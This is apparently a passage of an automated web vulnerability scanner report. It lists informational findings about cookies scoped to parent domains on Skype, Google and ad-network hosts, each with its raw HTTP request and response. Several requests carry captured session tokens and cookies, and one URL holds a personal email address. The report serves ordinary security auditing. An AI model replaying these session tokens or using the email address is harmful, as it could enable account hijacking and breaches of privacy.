Set-Cookie: VISITORID=1417999999; Domain=.www3.hp.com; Expires=Thu, 04-Sep-2014 09:58:51 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link cl
...[SNIP]...

10.31. http://ib.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?t=2&member=1001&user=8939182109&seg=150349&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%3D1211914&random=957794 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Cookie: uuid2=2595517907636879217; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipG]%M'kVQ+5_.jsT(PCR+h/?@s$k9hL!1.BNPbDHX

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 21:13:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2595517907636879217; path=/; expires=Sat, 03-Dec-2011 21:13:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2595517907636879217; path=/; expires=Sat, 03-Dec-2011 21:13:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipG]%M'kVQ+5_.jsT(PCR+h/>e0'Yoyn!0g:O:k[Qm; path=/; expires=Sat, 03-Dec-2011 21:13:42 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/pixel?t=2&id=1211914
Date: Sun, 04 Sep 2011 21:13:42 GMT
Content-Length: 0


10.32. http://id.google.com/verify/EAAAABu2UstRRffrSR7oBrVqvsg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAABu2UstRRffrSR7oBrVqvsg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAABu2UstRRffrSR7oBrVqvsg.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=WmGlkXdwqca1nm4j75M18GyAqO7DLXXzX2fg2CdM0Q=AyVLIvKmo1GP01k8; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=PLdCnMVP32Eq-aixxa5G1TBAISiRhCLS_FeQK0IhC5RmmIucxaAKox8g-5gdMc5axlq2f-p-_HJ2SXeA5BrEyahK9Sydv3VKM7AMsPdXWC8EarUF9azn6VC-tcSGO5ST

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=50=HHXn6Mh2AXznQJjBQ_jiWcmdfDSznvBXg6KAy1ffRQ=uyV2vHR7NewYPV6I; expires=Tue, 06-Mar-2012 02:20:27 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 05 Sep 2011 02:20:27 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.33. http://id.google.com/verify/EAAAAD62iUELm6gGoNz_95wbJa0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAD62iUELm6gGoNz_95wbJa0.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAD62iUELm6gGoNz_95wbJa0.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=HHXn6Mh2AXznQJjBQ_jiWcmdfDSznvBXg6KAy1ffRQ=uyV2vHR7NewYPV6I; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=PLdCnMVP32Eq-aixxa5G1TBAISiRhCLS_FeQK0IhC5RmmIucxaAKox8g-5gdMc5axlq2f-p-_HJ2SXeA5BrEyahK9Sydv3VKM7AMsPdXWC8EarUF9azn6VC-tcSGO5ST

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=ZPQD8fuJMOQI5s4Z9MfONwnbMd2RzPYqiZKsCDxwOlpRAuoJNxNrx5G8IFwTFkMcGwhz5SlrFLrYwMzlQCn8GDSpExBWP4wS1GsGI7TQPzoIcdgA9tAjsA_fx6b6-boa; expires=Tue, 06-Mar-2012 02:22:35 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 05 Sep 2011 02:22:35 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.34. http://id.google.com/verify/EAAAADICz-2SCXX7DbRNblZyv5k.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAADICz-2SCXX7DbRNblZyv5k.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADICz-2SCXX7DbRNblZyv5k.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=WmGlkXdwqca1nm4j75M18GyAqO7DLXXzX2fg2CdM0Q=AyVLIvKmo1GP01k8; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=XU0IQAZklWhyhWdlymBvdCxVkSIFK9aUlYUQMFi34UxO1ecYTEfO4ZrKByNclFfOyvF5AaGDzivPGm42OGxJA3ND_Gd1jskTnbkzYzvsb4F6P5IHltVNnazrs6Pi8hSq

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=PLdCnMVP32Eq-aixxa5G1TBAISiRhCLS_FeQK0IhC5RmmIucxaAKox8g-5gdMc5axlq2f-p-_HJ2SXeA5BrEyahK9Sydv3VKM7AMsPdXWC8EarUF9azn6VC-tcSGO5ST; expires=Mon, 05-Mar-2012 16:17:23 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 04 Sep 2011 16:17:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.35. https://login.skype.com/account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:19:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:35 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 33957
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

10.36. https://login.skype.com/account/login-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/login-form

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:19:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:11 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 47339
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

10.37. https://login.skype.com/account/password-automation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-automation

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/password-automation HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-name
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:00:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 18:00:16 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 43776
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt
...[SNIP]...

10.38. https://login.skype.com/account/password-token-sent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-token-sent

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/password-token-sent?mode=&email=h02332%40gmail.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 20:59:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 20:59:41 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 41059
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

10.39. https://login.skype.com/account/signup-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/signup-form

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 17:59:54 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 119699
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

10.40. https://login.skype.com/go/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:25 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

10.41. https://login.skype.com/go/shop.accessories.headsets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.headsets

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.accessories.headsets HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:27 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

10.42. https://login.skype.com/go/shop.accessories.phones  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.phones

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.accessories.phones HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:06 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

10.43. https://login.skype.com/go/shop.accessories.webcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.webcams

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.accessories.webcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:18 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

10.44. https://login.skype.com/go/shop.extras  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.extras

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.extras HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:20 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

10.45. https://login.skype.com/go/skype.manager.setup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/skype.manager.setup

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/skype.manager.setup HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:24 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

10.46. https://login.skype.com/go/tvwebcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/tvwebcams

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/tvwebcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:18 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

10.47. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/tre?ad_id=22273;evt=17163;cat1=21276;cat2=21277;rand=1234 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: media.fastclick.net
Proxy-Connection: Keep-Alive
Cookie: pluto2=886256604868; pluto=886256604868

Response

HTTP/1.1 302 Redirect
Date: Sun, 04 Sep 2011 21:13:42 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=oTyeCPDnrQEQmpS17AM&amp;guid=ON&amp;script=0
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: pluto=886256604868; domain=.fastclick.net; path=/; expires=Tue, 03-Sep-2013 21:13:42 GMT


